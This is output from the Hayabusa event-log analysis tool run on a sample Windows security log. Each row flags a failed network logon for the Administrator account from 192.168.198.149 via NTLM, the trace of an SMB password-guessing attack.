NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BsaSjESaUHbsIxJL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ca4dlxyEco3VOapw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Z6lJc7DXAOcNZ2G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Olt5mS7na07VDJE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oCFeQcUMDTs0ev8v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:29.233 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FYmH6CQrizoZ1DAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iYtujXkzySwZQFk8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KE9v6wzrebvjvDIl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81gmRFFBHI1s4dqi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C8gHWPDjQM8M3tiQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: szj4mJvtFV06CuR2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ceGEl87hOM0InAAd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XRv3C3rRxYXTgckj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TaPkJPIQnbL3VyUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LZ7PZAT6hWWHNc29 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJVD4uVhwfLSJ6Ab | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6KME1I6tE0v9UAq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Qtt1rk4n3tOJko2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: prPsA8EZHGfGPSHm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TQqGXnwHtB87LSzT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6uLT1bjaIS0XBsWC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PIgpraQTxFrcLphN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1D6qy57XImq4prx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Kw44Ffh4DIPlyuM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oKUdmKU74RmJysAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gZUTzZw0T1tYRSP5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nEOfjuAMa7HTsfcP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e7bG19emMTmyBQNm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YsLkgWukfqS3wWJK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: liFcZjjpY3xXwe9j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vBUgbfzx2OEcOxWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iVCV0WoZmLTFNH71 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJmxGOqck4oQi1kL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w7lYqaUvEtTp18DK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yZ9xQmGn61JJDeQS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XuMXpvY9fmLm0eBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ofesuNErTLWuN0k4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KsNq7SThd3b8oTwF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmRWg5gNRcxDMFjg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JXrGn6LehVwTGNNj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vIq9DS71jCjWbgdY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kw2BQbdUml0EPNOs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ugOqsKQFGmmLac3s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3rZHUbOUVBYiHarB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: otv8ByrbWWoTz7pi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HVlHkJu4Gxc9dhxM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xKF5OCqLVVKvung0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: avAdpkOlP0xji1vG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VFgzMjEz6M0LBnX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kdJb0obVAqkY9GCw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ciSoQcLUgLfzaNg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RECrGCCTJuDPlvYJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Z2w67uyC2NOgecT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRVetRdHvz0lJkOC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yXrtxquzyzxKnQgD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWOoEIEem7Q9Mdx0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86n5nIm04810NptD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M08noHtTqqx3pxSe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3P983pRVfCVlVTyA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eMKlcLvRhlx9FMcZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0gwEDgRF2wUgTDAy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I9Q2GSALfiuEbulo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DKTja76Qe9vSjrdN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXXuUyKlvaOgMNSu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X3qdEQReXwHAZUS8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FqtfHJKOfmWXEd4s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mVv7vete3uXixggi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0PF6E3wRP0Tk39ss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: touwF4IXUahG7jvJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lMOi7rygc7SJ5TPQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QjM1K5eFSA9U37oE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HgzyZqFU9v2kDVvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hJeVj2h0sBxwBuGv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FNXI8b6Zcj1zU3JY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
